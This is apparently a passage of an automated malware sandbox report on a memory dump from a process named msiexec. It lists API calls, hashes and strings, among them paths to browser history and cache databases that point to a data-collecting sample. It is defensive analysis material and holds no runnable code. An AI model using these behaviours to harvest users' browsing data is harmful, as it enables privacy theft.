                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                                      • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                      • API String ID: 3354267031-2114579845
                                                                                                      • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                      • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                      • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                      • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset
                                                                                                      • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                      • API String ID: 2221118986-1725073988
                                                                                                      • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                      • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                      • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                      • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                      APIs
                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                      • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$memcmp
                                                                                                      • String ID: $$8
                                                                                                      • API String ID: 2808797137-435121686
                                                                                                      • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                      • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                      • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                      • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                        • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                        • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                        • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                        • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                        • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                        • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                        • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                        • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                      • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                        • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                        • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                        • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,76F92EE0), ref: 0040E3EC
                                                                                                      • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                      • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                        • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                        • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                        • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                      • String ID:
                                                                                                      • API String ID: 1979745280-0
                                                                                                      • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                      • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                      • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                      • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                      APIs
                                                                                                        • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                      • memset.MSVCRT ref: 00414C87
                                                                                                      • wcscpy.MSVCRT ref: 00414CFC
                                                                                                        • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                      Strings
                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProcVersionmemsetwcscpy
                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                      • API String ID: 4182280571-2036018995
                                                                                                      • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                      • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                      • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                      • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                      APIs
                                                                                                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                      • memset.MSVCRT ref: 00403A55
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                      • String ID: history.dat$places.sqlite
                                                                                                      • API String ID: 2641622041-467022611
                                                                                                      • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                      • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                      • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                      • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                      APIs
                                                                                                        • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                      • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                      • GetLastError.KERNEL32 ref: 00417627
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$File$PointerRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 839530781-0
                                                                                                      • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                      • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                      • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                      • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileFindFirst
                                                                                                      • String ID: *.*$index.dat
                                                                                                      • API String ID: 1974802433-2863569691
                                                                                                      • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                      • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                      • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                      • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                      APIs
                                                                                                      • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                      • GetLastError.KERNEL32 ref: 004175A2
                                                                                                      • GetLastError.KERNEL32 ref: 004175A8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$FilePointer
                                                                                                      • String ID:
                                                                                                      • API String ID: 1156039329-0
                                                                                                      • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                      • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                      • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                      • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                      APIs
                                                                                                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                      • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                      • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$CloseCreateHandleTime
                                                                                                      • String ID:
                                                                                                      • API String ID: 3397143404-0
                                                                                                      • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                      • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                      • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                      • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                      APIs
                                                                                                      • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                      • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                      • String ID:
                                                                                                      • API String ID: 1125800050-0
                                                                                                      • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                      • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                      • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                      • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                      APIs
                                                                                                      • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                      • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandleSleep
                                                                                                      • String ID: }A
                                                                                                      • API String ID: 252777609-2138825249
                                                                                                      • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                      • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                      • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                      • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                      APIs
                                                                                                      • malloc.MSVCRT ref: 00409A10
                                                                                                      • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                      • free.MSVCRT ref: 00409A31
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: freemallocmemcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 3056473165-0
                                                                                                      • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                      • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                      • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                      • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: d
                                                                                                      • API String ID: 0-2564639436
                                                                                                      • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                      • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                      • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                      • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset
                                                                                                      • String ID: BINARY
                                                                                                      • API String ID: 2221118986-907554435
                                                                                                      • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                      • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                      • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                      • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _wcsicmp
                                                                                                      • String ID: /stext
                                                                                                      • API String ID: 2081463915-3817206916
                                                                                                      • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                      • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                      • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                      • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                      APIs
                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                      • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                      • String ID:
                                                                                                      • API String ID: 2445788494-0
                                                                                                      • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                                      • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                      • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                                      • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                      • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 3150196962-0
                                                                                                      • Opcode ID: 86234f6dcfe5183eb12d2d600ddfcc7b691cb690ca4801b5099eddac0042a321
                                                                                                      • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                      • Opcode Fuzzy Hash: 86234f6dcfe5183eb12d2d600ddfcc7b691cb690ca4801b5099eddac0042a321
                                                                                                      • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: malloc
                                                                                                      • String ID: failed to allocate %u bytes of memory
                                                                                                      • API String ID: 2803490479-1168259600
                                                                                                      • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                      • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                                      • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                      • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0041BDDF
                                                                                                      • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcmpmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 1065087418-0
                                                                                                      • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                      • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                      • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                      • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                      • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                      • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                                                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                        • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                        • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                        • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
